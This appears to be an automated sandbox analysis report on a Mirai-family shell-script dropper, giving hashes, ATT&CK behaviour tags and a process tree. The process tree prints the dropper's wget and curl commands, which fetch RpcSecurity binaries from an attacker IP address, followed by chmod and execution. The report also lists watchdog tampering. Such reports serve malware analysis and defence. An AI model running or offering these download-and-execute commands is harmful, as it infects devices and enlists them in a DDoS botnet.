Analysis
-
max time kernel
137s -
max time network
141s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240729-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240729-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
28-12-2024 02:48
Static task
static1
Behavioral task
behavioral1
Sample
ce9a5d9b5c25ecfcde1c946901db42efdfa881de812e2a1cab84b1650b057a7a.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
ce9a5d9b5c25ecfcde1c946901db42efdfa881de812e2a1cab84b1650b057a7a.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
ce9a5d9b5c25ecfcde1c946901db42efdfa881de812e2a1cab84b1650b057a7a.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
ce9a5d9b5c25ecfcde1c946901db42efdfa881de812e2a1cab84b1650b057a7a.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
ce9a5d9b5c25ecfcde1c946901db42efdfa881de812e2a1cab84b1650b057a7a.sh
-
Size
2KB
-
MD5
c01f89f66afa819108643774b814bfaf
-
SHA1
abde31c7a7b764f70527ef07b3f57a9993b949b8
-
SHA256
ce9a5d9b5c25ecfcde1c946901db42efdfa881de812e2a1cab84b1650b057a7a
-
SHA512
a5e94401ba1d9e605e4c65143c57eb3235ee0a6a63f71e55a129e57cf6252c33f51aa2ee46271796d7b21f28eb1cbbbd6fa0d380de376714dcc17e05ebd06f80
Malware Config
Extracted
mirai
DEMONS
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 2 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1512 chmod 1519 chmod -
Executes dropped EXE 2 IoCs
ioc pid Process /tmp/RpcSecurity 1513 RpcSecurity /tmp/RpcSecurity 1520 RpcSecurity -
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog RpcSecurity File opened for modification /dev/misc/watchdog RpcSecurity -
Enumerates active TCP sockets 1 TTPs 2 IoCs
Gets active TCP sockets from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/tcp RpcSecurity File opened for reading /proc/net/tcp RpcSecurity -
Writes file to system bin folder 1 IoCs
description ioc Process File opened for modification /sbin/watchdog RpcSecurity -
Changes its process name 1 IoCs
description pid Process Changes the process name, possibly in an attempt to hide itself 1513 RpcSecurity -
Reads system network configuration 1 TTPs 2 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/tcp RpcSecurity File opened for reading /proc/net/tcp RpcSecurity -
System Network Configuration Discovery 1 TTPs 2 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1515 wget 1517 curl -
Writes file to tmp directory 5 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/RpcSecurity.x86 wget File opened for modification /tmp/RpcSecurity.x86 curl File opened for modification /tmp/RpcSecurity ce9a5d9b5c25ecfcde1c946901db42efdfa881de812e2a1cab84b1650b057a7a.sh File opened for modification /tmp/RpcSecurity.mips wget File opened for modification /tmp/RpcSecurity.mips curl
Processes
-
/tmp/ce9a5d9b5c25ecfcde1c946901db42efdfa881de812e2a1cab84b1650b057a7a.sh/tmp/ce9a5d9b5c25ecfcde1c946901db42efdfa881de812e2a1cab84b1650b057a7a.sh1⤵
- Writes file to tmp directory
PID:1505 -
/usr/bin/wgetwget http://5.175.237.74/GuruITDDoS/RpcSecurity.x862⤵
- Writes file to tmp directory
PID:1506
-
-
/usr/bin/curlcurl -O http://5.175.237.74/GuruITDDoS/RpcSecurity.x862⤵
- Writes file to tmp directory
PID:1510
-
-
/bin/catcat RpcSecurity.x862⤵PID:1511
-
-
/bin/chmodchmod +x ce9a5d9b5c25ecfcde1c946901db42efdfa881de812e2a1cab84b1650b057a7a.sh config-err-Z2iRmj netplan_rmicsxkz RpcSecurity RpcSecurity.x86 snap-private-tmp ssh-fM0WPAM8rKdw systemd-private-20cc4649210b49a4bb7be6d1097bb61c-bolt.service-R4fkcx systemd-private-20cc4649210b49a4bb7be6d1097bb61c-colord.service-VTiSeD systemd-private-20cc4649210b49a4bb7be6d1097bb61c-ModemManager.service-bxgrMV systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-resolved.service-5lDpv9 systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-timedated.service-DiKWu92⤵
- File and Directory Permissions Modification
PID:1512
-
-
/tmp/RpcSecurity./RpcSecurity2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:1513
-
-
/usr/bin/wgetwget http://5.175.237.74/GuruITDDoS/RpcSecurity.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1515
-
-
/usr/bin/curlcurl -O http://5.175.237.74/GuruITDDoS/RpcSecurity.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1517
-
-
/bin/chmodchmod +x ce9a5d9b5c25ecfcde1c946901db42efdfa881de812e2a1cab84b1650b057a7a.sh config-err-Z2iRmj netplan_rmicsxkz RpcSecurity RpcSecurity.mips RpcSecurity.x86 snap-private-tmp ssh-fM0WPAM8rKdw systemd-private-20cc4649210b49a4bb7be6d1097bb61c-bolt.service-R4fkcx systemd-private-20cc4649210b49a4bb7be6d1097bb61c-colord.service-VTiSeD systemd-private-20cc4649210b49a4bb7be6d1097bb61c-ModemManager.service-bxgrMV systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-resolved.service-5lDpv9 systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-timedated.service-DiKWu92⤵
- File and Directory Permissions Modification
PID:1519
-
-
/tmp/RpcSecurity./RpcSecurity2⤵
- Executes dropped EXE
- Enumerates active TCP sockets
- Reads system network configuration
PID:1520
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
54KB
MD57e83ac9f8b9ae088c5336df0d874926f
SHA1a5fe7d25942a9f04f8a4cfb57d5781d7042a48d5
SHA2561b8b5cc9cb64473380cd6898f7580339f38a3cd6e7f90d1768c7842e998bb3ed
SHA5120e4dda062bb583dad01c1a9ab9018303003dce5078c30af63b222fa82b93f4fc19bc0bdd6e8f4c3024b0d9502470bbf26238ea991f08ded59e040b89f3156d2b